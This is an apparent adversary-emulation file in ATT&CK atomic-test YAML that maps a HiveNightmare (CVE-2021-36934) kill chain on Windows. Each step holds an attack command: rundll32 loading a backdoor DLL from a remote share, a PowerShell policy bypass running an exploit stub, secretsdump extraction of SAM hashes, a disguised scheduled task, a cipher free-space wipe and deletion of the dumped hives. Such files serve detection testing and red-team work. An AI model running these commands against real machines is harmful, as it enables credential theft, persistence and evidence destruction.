# HiveNightmare Kill Chain (MITRE ATT&CK YAML)

- attack_technique: T1078
  display_name: Initial Access - Valid Accounts / Drive-by
  atomic_tests:
    - name: User accesses exposed print interface or drops fileless loader
      executor:
        name: command_prompt
        command: |
          # Simulate user or attacker access
          start msedge.exe http://target-printer
  description: |
    Initial access via exposed print interface or drive-by download of dropper.
  supported_platforms: [windows]

- attack_technique: T1218
  display_name: Execution - DLL Side-Loading / LOLBins
  atomic_tests:
    - name: Reflective DLL injection via rundll32
      executor:
        name: command_prompt
        command: |
          rundll32.exe \\10.10.X.X\share\dll_backdoor_x64.dll,ReflectEntry
  description: |
    Execute payload in-memory using trusted Windows binaries (LOLBins).
  supported_platforms: [windows]

- attack_technique: T1068
  display_name: Privilege Escalation - HiveNightmare Exploit
  atomic_tests:
    - name: Abuse vulnerable ACLs to copy registry hives
      executor:
        name: command_prompt
        command: |
          powershell -ep bypass -file nightmare_stub.ps1
  description: |
    Exploit HiveNightmare (CVE-2021-36934) to copy SAM/SYSTEM/SECURITY hives.
  supported_platforms: [windows]

- attack_technique: T1003.002
  display_name: Credential Access - Dump SAM Database
  atomic_tests:
    - name: Extract hashes from copied hives
      executor:
        name: command_prompt
        command: |
          secretsdump.py -sam sam.bak -system system.bak LOCAL
  description: |
    Dump credentials from registry hives obtained via HiveNightmare.
  supported_platforms: [windows]

- attack_technique: T1053.005
  display_name: Persistence - Scheduled Task Creation
  atomic_tests:
    - name: Schedule payload with schtasks.exe
      executor:
        name: command_prompt
        command: |
          schtasks /create /tn "WinUpdater" /tr "HiveNightmare.exe" /sc onlogon /f
  description: |
    Maintain persistence using schtasks.exe to run payload at logon.
  supported_platforms: [windows]

- attack_technique: T1485
  display_name: Impact - Data Destruction (Wipe)
  atomic_tests:
    - name: Wipe free space with cipher.exe
      executor:
        name: command_prompt
        command: |
          cipher /w:C:\
  description: |
    Use cipher.exe to wipe free space and inhibit recovery.
  supported_platforms: [windows]

- attack_technique: T1070.004
  display_name: Defense Evasion - File Deletion
  atomic_tests:
    - name: Remove dropped and dumped artifacts
      executor:
        name: command_prompt
        command: |
          del /f /q %TEMP%\sam.bak
          del /f /q %TEMP%\system.bak
          del /f /q %TEMP%\security.bak
  description: |
    Remove payloads and dumped artifacts post-operation using built-in deletion commands.
  supported_platforms: [windows]

# End of kill chain

